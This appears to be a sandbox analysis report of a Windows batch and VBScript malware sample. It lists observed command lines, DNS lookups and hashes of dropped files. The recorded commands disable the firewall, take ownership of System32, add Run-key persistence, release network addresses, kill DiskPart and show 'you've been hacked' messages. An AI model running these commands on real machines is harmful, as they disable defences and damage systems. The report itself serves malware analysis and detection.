C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\certutil.exe
certutil -encode "C:\Windows\System32\Twain_20.dll" "C:\Users\Admin\AppData\Local\Temp\Twain_20.dll"
C:\Windows\system32\certutil.exe
certutil -encode "C:\Windows\System32\Twain_20.dll" "C:\Users\Admin\AppData\Local\Temp\Twain_20.dll"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\certutil.exe
certutil -encode "C:\Windows\System32\Twain_20.dll" "C:\Users\Admin\AppData\Local\Temp\Twain_20.dll"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\certutil.exe
certutil -encode "C:\Windows\System32\Twain_20.dll" "C:\Users\Admin\AppData\Local\Temp\Twain_20.dll"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\notepad.exe
notepad
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\calc.exe
calc
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\notepad.exe
notepad
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\notepad.exe
notepad
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\msg.exe
msg * Virus Detectado
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\notepad.exe
notepad
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\calc.exe
calc
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\calc.exe
calc
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\notepad.exe
notepad
C:\Windows\system32\mspaint.exe
mspaint.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
C:\Windows\system32\calc.exe
calc
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
C:\Windows\system32\notepad.exe
notepad
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.56.20.217.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\TempShingapi.sk.bat
| MD5 | 977b003963e42262994223bfb827d610 |
| SHA1 | c357ccea26f64da9ad5c3bf96b83e12ccaeb916e |
| SHA256 | d7a449acbcb78e0fb137a868d2c8b4e86f32d643cde7e7f291f77e5480ae2bb8 |
| SHA512 | 99e3dadeebc8c35c6a47a0c7de4e82dbd558f5c23df910ff6899537f3ae370c4c5ea125353cb22ae469a332dfec14577a06ae651309405ef2e69ea000ff18e6d |
C:\Users\Admin\AppData\Local\Temp\x.bin
| MD5 | 2e40c97f7790fed7606c2ab881340ce5 |
| SHA1 | b45ccff0eaffed71c822b8ad31bf2342e5aaa2cb |
| SHA256 | 299fedc96d0eaf4f1bf6398fb9c8d30b1f3f10571e834b93432bb02297b0648f |
| SHA512 | 339a2e2e931890628aee8e708a8f5d2057e8ca3a40c48689852867d99d1c56ee926f192ab3893201823ce25b0174384fcbf1e1fe7567eb11beed3babcd8e7b53 |
C:\Users\Admin\AppData\Local\Temp\ADZP-20-Complex.bat
| MD5 | 591700c81fbd38cf8c83092030536c14 |
| SHA1 | a122ca4b91ec2275400e10f21093c43186391c97 |
| SHA256 | 29415d32850d821d9854bfd6edabee920052e0920e6eceec187ea57b8a3c707e |
| SHA512 | ae3e1ffef5a82016f13fe728a8a3f2696ed55cdd9ea60d6e75352d55f95fe71cb09bad02945601d4661818473882cc4fae4493d9125e3803054e69c861a97758 |
C:\Users\Admin\AppData\Local\Temp\Twain_20.dll
| MD5 | 36deca5bd53f31d062d07c1d3fa0cc8d |
| SHA1 | 1d245de03d3725b180f572b15036cbb168445edf |
| SHA256 | d6607a9ec5fc0698f50382ffe61a4ad1f36a8b26c0834c305f40e41647980668 |
| SHA512 | e1253113a5dfd1cd7e93dfe45649d89e072db432b1724aaf36c7b082b38e770c4755e4d01c136134bb9356f74daa1e7205e5fa43f575edb5013a91f738be71c1 |
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
| MD5 | 72946942abf5cf295f726b816c531ebf |
| SHA1 | 8ac5ccae8003c3776c2e0ee0959a76c8bc913495 |
| SHA256 | d9fc0446467e00e640f0dd0bf36882943a6993dcc1038ba8f73239152896eb25 |
| SHA512 | 2f42b10e2c1359a690e1a69e307008e3beb4712e4c071d916fb1380c61cb2ed3ae48c86af44c6f1c9d613e85dd75d8cfd66fd01de0649444ee6d5193d9789d23 |
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
| MD5 | 0c998e3681eb9f67fbacda38281c5fa7 |
